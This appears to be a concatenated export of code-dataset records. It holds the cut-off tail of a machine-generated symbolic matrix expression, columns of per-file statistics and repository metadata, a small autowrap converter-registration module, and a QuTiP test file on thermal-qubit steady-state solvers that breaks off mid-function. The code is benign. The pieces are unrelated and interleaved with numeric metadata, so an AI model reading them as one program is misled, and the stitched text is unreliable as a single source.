q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*(2*q[3, 0] - q[4, 0] - q[5, 0])**2 + 1)*(2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0]) + (2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 53.3333333333333*q[3, 0] - 26.6666666666667*q[4, 0] - 26.6666666666667*q[5, 0])*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1))*(-160351958.315909*xi**10*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*xi**2*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-38484469995.8182*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 1217672683.46143*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 23972930.955647*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 252839.506172839*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1066.66666666667*(q[4, 0] - q[5, 0])**2 + 1) + (4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0]))*(2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + 60131984.3684659*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 1522090.85432679*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 22474.6227709191*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 79.0123456790123*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(2*q[0, 0]**2 - 2*q[0, 0]*q[1, 0] - 2*q[0, 0]*q[2, 0] + 2*q[1, 0]**2 - 2*q[1, 0]*q[2, 0] + 2*q[2, 0]**2) + (4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)) + (-160351958.315909*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 53.3333333333333*q[0, 0] - 26.6666666666667*q[1, 0] - 26.6666666666667*q[2, 0]) + (60131984.3684659*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*q[3, 0] + (1/3)*q[4, 0] + (1/3)*q[5, 0] + 0.15)*(-51312626661.0909*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**5 + 1623563577.94858*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 31963907.9408627*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 337119.341563786*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1422.22222222222*q[0, 0]**2 + 1422.22222222222*q[0, 0]*q[1, 0] + 1422.22222222222*q[0, 0]*q[2, 0] - 1422.22222222222*q[1, 0]**2 + 1422.22222222222*q[1, 0]*q[2, 0] - 1422.22222222222*q[2, 0]**2 + 1) + (1/3)*q[0, 0] + (1/3)*q[1, 0] + (1/3)*q[2, 0] + 0.15]
])
| 8,575.571429
| 20,373
| 0.408119
| 16,926
| 60,029
| 1.447418
| 0.005376
| 0.241071
| 0.108862
| 0.107596
| 0.997265
| 0.997061
| 0.994163
| 0.992612
| 0.992326
| 0.991714
| 0
| 0.371215
| 0.176931
| 60,029
| 7
| 20,374
| 8,575.571429
| 0.124636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.142857
| 0.142857
| 0.428571
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 14
|
941a171cda5c978afdbc1cfcc4cf862ee027a62c
| 196
|
py
|
Python
|
tests/test_files/converters/__init__.py
|
OpenMS/autowrap
|
050e63292b857a97b3cea7991d82bdedaaf7e4ee
|
[
"BSD-3-Clause"
] | 2
|
2022-01-29T12:34:58.000Z
|
2022-02-02T09:42:30.000Z
|
tests/test_files/converters/__init__.py
|
OpenMS/autowrap
|
050e63292b857a97b3cea7991d82bdedaaf7e4ee
|
[
"BSD-3-Clause"
] | 37
|
2022-01-05T17:06:14.000Z
|
2022-03-30T19:14:32.000Z
|
tests/test_files/converters/__init__.py
|
OpenMS/autowrap
|
050e63292b857a97b3cea7991d82bdedaaf7e4ee
|
[
"BSD-3-Clause"
] | 5
|
2022-01-05T20:31:50.000Z
|
2022-03-29T12:22:12.000Z
|
from .IntHolderConverter import IntHolderConverter
def register_converters():
from autowrap.ConversionProvider import special_converters
special_converters.append(IntHolderConverter())
| 24.5
| 62
| 0.836735
| 17
| 196
| 9.470588
| 0.588235
| 0.21118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112245
| 196
| 7
| 63
| 28
| 0.925287
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
941d65f91756e438ba3d033d639ae9e738ca0e77
| 15,694
|
py
|
Python
|
qutip/tests/test_steadystate.py
|
quantshah/qutip
|
88919ce50880dadbc1a817a3e6059c82c23a83f9
|
[
"BSD-3-Clause"
] | 1
|
2022-03-31T06:57:30.000Z
|
2022-03-31T06:57:30.000Z
|
qutip/tests/test_steadystate.py
|
quantshah/qutip
|
88919ce50880dadbc1a817a3e6059c82c23a83f9
|
[
"BSD-3-Clause"
] | null | null | null |
qutip/tests/test_steadystate.py
|
quantshah/qutip
|
88919ce50880dadbc1a817a3e6059c82c23a83f9
|
[
"BSD-3-Clause"
] | 1
|
2019-03-04T12:47:22.000Z
|
2019-03-04T12:47:22.000Z
|
import numpy as np
from numpy.testing import assert_, assert_equal, run_module_suite
from qutip import (sigmaz, destroy, steadystate, expect, coherent_dm,
build_preconditioner)
def test_qubit_direct():
"Steady state: Thermal qubit - direct solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='direct')
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_eigen():
"Steady state: Thermal qubit - eigen solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='eigen')
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_power():
"Steady state: Thermal qubit - power solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='power', mtol=1e-5)
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_power_gmres():
"Steady state: Thermal qubit - power-gmres solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='power-gmres', mtol=1e-1)
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_power_bicgstab():
"Steady state: Thermal qubit - power-bicgstab solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='power-bicgstab', use_precond=1)
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_gmres():
"Steady state: Thermal qubit - iterative-gmres solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='iterative-gmres')
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_qubit_bicgstab():
"Steady state: Thermal qubit - iterative-bicgstab solver"
# thermal steadystate of a qubit: compare numerics with analytical formula
